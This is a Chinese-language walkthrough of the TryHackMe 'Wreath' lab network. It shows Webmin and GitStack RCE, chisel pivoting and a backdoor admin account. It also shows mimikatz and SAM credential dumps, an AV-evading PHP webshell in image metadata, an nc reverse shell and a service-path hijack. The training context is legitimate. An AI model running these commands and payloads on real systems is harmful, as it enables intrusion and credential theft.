TryHackMe-Wreath
背景知识:
-
网络上有三台机器
-
至少有一台公共面向的Web服务器
-
网络中某处存在一个自托管的Git服务器
-
Git服务器是内部的,因此Thomas可能已经将敏感信息推送到其中
-
网络上运行着一台安装了杀毒软件的PC,这意味着它很可能是Windows系统
-
听起来这很可能是Windows Server版本,这对我们来说可能会起作用。
-
Windows PC无法直接从Web服务器访问
信息搜集
nmap
└─# nmap -sC -sV 10.200.105.200
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-21 07:47 EDT
Nmap scan report for 10.200.105.200
Host is up (0.33s latency).
Not shown: 972 filtered tcp ports (no-response), 23 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 9c:1b:d4:b4:05:4d:88:99:ce:09:1f:c1:15:6a:d4:7e (RSA)
| 256 93:55:b4:d9:8b:70:ae:8e:95:0d:c2:b6:d2:03:89:a4 (ECDSA)
|_ 256 f0:61:5a:55:34:9b:b7:b8:3a:46:ca:7d:9f:dc:fa:12 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
|_http-title: Did not follow redirect to https://thomaswreath.thm
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-title: Thomas Wreath | Developer
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=thomaswreath.thm/organizationName=Thomas Wreath Development/stateOrProvinceName=East Riding Yorkshire/countryName=GB
| Not valid before: 2023-05-21T11:43:48
|_Not valid after: 2024-05-20T11:43:48=
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.890
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.22 seconds/etc/hosts添加10.200.105.200 thomaswreath.thm记录
web
443为个人页面,包含个人信息
10000端口存在webmin 1.89,该版本存在CVE-2019–15107
MiniServ getshell
MiniServ 1.89版本google到rce,github利用:https://github.com/MuirlandOracle/CVE-2019-15107,直接是root权限
弹shell到本地
chisel搭建隧道
curl把nmap传过去扫描内网IP
./nmap -sP 10.200.105.0/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-05-22 12:17 BST
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for ip-10-200-105-1.eu-west-1.compute.internal (10.200.105.1)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.18s latency).
MAC Address: 02:FE:CC:AF:62:61 (Unknown)
Nmap scan report for ip-10-200-105-100.eu-west-1.compute.internal (10.200.105.100)
Host is up (0.00016s latency).
MAC Address: 02:F8:2E:F3:7A:D1 (Unknown)
Nmap scan report for ip-10-200-105-150.eu-west-1.compute.internal (10.200.105.150)
Host is up (0.00017s latency).扫150主机开放端口
Host is up (0.00052s latency).
Not shown: 14997 filtered ports
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
5985/tcp open wsman
MAC Address: 02:8C:A3:01:42:9F (Unknown)chisel转发80到本地访问
gitstack getshell
泄露了路由直接访问
searchspliot找到gitstack2.3.10 rce,改下脚本的IP端口即可执行命令
py文件已经往网站根目录写入了一个webshell,直接利用即可
现在想办法把shell弹回本地,但是现在有个问题,那就是这台主机不和我们的kali通信,只和局域网内centos通信,因此可以考虑用chisel做一个中继
首先题目提示了需要在centos中添加规则放行端口:firewall-cmd --zone=public --add-port 15001/tcp
传个nc到centos再监听,webshell执行powershell反弹回centos
添加用户rdp到目标主机
添加用户并添加管理员组和远程管理组
PS C:\GitStack\gitphp> net user attack
net user attack
User name attack
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 22/05/2023 13:40:39
Password expires Never
Password changeable 22/05/2023 13:40:39
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
*Users
Global Group memberships *None
The command completed successfully.
chisel再中继个端口即可evil-winrm登上去
或者中转3389端口xfreerdp上去
传个mimikatz.exe上去,可以用evil-winrm,也可以xfreerdp开个共享
xfreerdp /v:127.0.0.1 /u:hack /p:hack123 /cert-ignore /drive:share1,/home/ban/tools/test
dumphash
.\mimikatz.exe "privilege::debug" "lsadump::sam" exit发现启用了LSA保护
再上传一个
.\mimikatz.exe "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "sekurlsa::logonpasswords" exit还是绕不过,直接xfreerdp登3389右键管理员运行cmd
现在目标是100这台主机,传一个expire里的Import-portscan.ps1扫描端口
现在需要访问10.200.105.100的80端口,所以还需要搭建一个二层代理,也就是kali-linux(200)-windows(150)-100
window首先netsh防火墙放行端口用于正向代理侦听
netsh advfirewall firewall add rule name="chisel-readme" dir=in action=allow protocol=tcp localport=44455
因为kali并不和150通信,所以需要linux做一个中间转发,即连接kali的8005就相当于连接150的44455
kali正向连过去
搭建完毕,现在我们要访问100:80只需要浏览器配置一下代理即可
或者proxychain加一条socks5记录
搜索website.git
Get-ChildItem -Path "C:\\" -Filter "*.git" -Recurse
download下来,再git恢复源码
查看commit-beta.txt更改git commit的顺序
separator="======================================="; for i in $(ls); do printf "\n\n$separator\n\033[4;1m$i\033[0m\n$(cat $i/commit-meta.txt)\n"; done; printf "\n\n$separator\n\n\n"
正确的顺序应该是static--- Initial --- update,最新的版本是2-xx
代码审计文件上传
resource下有个index.php
<?php
if(isset($_POST["upload"]) && is_uploaded_file($_FILES["file"]["tmp_name"])){
$target = "uploads/".basename($_FILES["file"]["name"]);
$goodExts = ["jpg", "jpeg", "png", "gif"];
if(file_exists($target)){
header("location: ./?msg=Exists");
die();
}
$size = getimagesize($_FILES["file"]["tmp_name"]);
if(!in_array(explode(".", $_FILES["file"]["name"])[1], $goodExts) || !$size){
header("location: ./?msg=Fail");
die();
}
move_uploaded_file($_FILES["file"]["tmp_name"], $target);
header("location: ./?msg=Success");
die();
} else if ($_SERVER["REQUEST_METHOD"] == "post"){
header("location: ./?msg=Method");
}
if(isset($_GET["msg"])){
$msg = $_GET["msg"];
switch ($msg) {
case "Success":
$res = "File uploaded successfully!";
break;
case "Fail":
$res = "Invalid File Type";
break;
case "Exists":
$res = "File already exists";
break;
case "Method":
$res = "No file send";
break;
}
}
?>
<!DOCTYPE html>
<html lang=en>
<!-- ToDo:
- Finish the styling: it looks awful
- Get Ruby more food. Greedy animal is going through it too fast
- Upgrade the filter on this page. Can't rely on basic auth for everything
- Phone Mrs Walker about the neighbourhood watch meetings
-->
<head>
<title>Ruby Pictures</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="assets/css/Andika.css">
<link rel="stylesheet" type="text/css" href="assets/css/styles.css">
</head>
<body>
<main>
<h1>Welcome Thomas!</h1>
<h2>Ruby Image Upload Page</h2>
<form method="post" enctype="multipart/form-data">
<input type="file" name="file" id="fileEntry" required, accept="image/jpeg,image/png,image/gif">
<input type="submit" name="upload" id="fileSubmit" value="Upload">
</form>
<p id=res><?php if (isset($res)){ echo $res; };?></p>
</main>
</body>
</html>过滤类型验证只传递了第二个参数,因此,构造a.jpg.php即可绕过后缀检测并解析php
if(!in_array(explode(".", $_FILES["file"]["name"])[1], $goodExts) || !$size){
header("location: ./?msg=Fail");
die();
}getimagesize函数通过检测文件是否包含图像尺寸来验证目标文件是否为图像,因此直接构造php行不通,必须复制一个正常的图片改名,然后插入webshell到comments属性中来执行
$size = getimagesize($_FILES["file"]["tmp_name"]);访问resources页面需要身份验证,前面已经根据Thomas的NTLM hash获得了密码,直接登录
构造php,根据之前的提示,100主机上有杀软,直接传马会被杀掉,因此先传个概念验证
./exiftool -Comment="<?php echo \"<pre>done and ok</pre>\"; die(); ?>" shell.jpeg.php
上传成功解析
混淆php以躲避av
原php:
<?php
$cmd = $_GET["a"];
if(isset($cmd)){
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>https://www.gaijin.at/en/tools/php-oabfuscator,混淆
<?php $j0=$_GET["a"];if(isset($j0)){echo "<pre>".shell_exec($j0)."</pre>";}die();?>./exiftool -Comment="<?php \$j0=\$_GET[\"a\"];if(isset(\$j0)){echo \"<pre>\".shell_exec(\$j0).\"</pre>\";}die();?>" shell.jpeg.php
传到150主机上传
验证得100主机可打kali,但是kali无法ping主机,所以只能反向
先把改编译的nc传上去
开放端口
netsh advfirewall firewall add rule name="chisel-readme" dir=in action=allow protocol=tcp localport=8080python2开放http服务器
webshell执行
curl http://10.200.73.150:8080/nc.exe -o c:\\windows\\temp\\nc-hack.exe
powershell执行
powershell.exe c:\\windows\\temp\\nc-hack.exe 10.50.66.105 4446 -e cmd.exe成功反弹shell
可访问服务路径提权
有SeImpersonatePrivilege,可以尝试PrintSpoofer和土豆家族
寻找非默认服务
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"注意到有个服务的路径没有用引号包裹
可以尝试未加引号的服务路径攻击
查看改服务在哪个账户运行
LocalSystem即system权限
检查服务路径的权限
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
显示所有本地账户都有访问权限
那么思路就是替换SystemExplorerService64.exe为我们自己的exe反弹shell
编译
curl直接传到目录
curl http://10.200.73.150:8080/evil.exe -o evil.exe
先实验一下evil.exe能不能反弹shell
那么替换即可
先stop服务
sc stop SystemExplorerHelpService
再替换
copy evil.exe "C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe"
监听6667端口准备接受Shell
启动服务
临时smb转储hash
现在尝试转储当前系统的hash,也就是HKLM\SYSTEM和HKLM\SAM的过程,可以通过impacket-smbserver直接转储到kali上
smb启动一个临时的SMB服务器
sudo python3 smbserver.py share . -smb2support -username user -password s3cureP@ssword身份验证
net use \\10.50.66.105\share /USER:user s3cureP@ssword
转储sam和system传输到本地
reg.exe save HKLM\SAM \\10.50.66.105\share\sam.bak
reg.exe save HKLM\SYSTEM \\10.50.66.105\share\system.bak
secretsdump.py解析出hash
完结撒花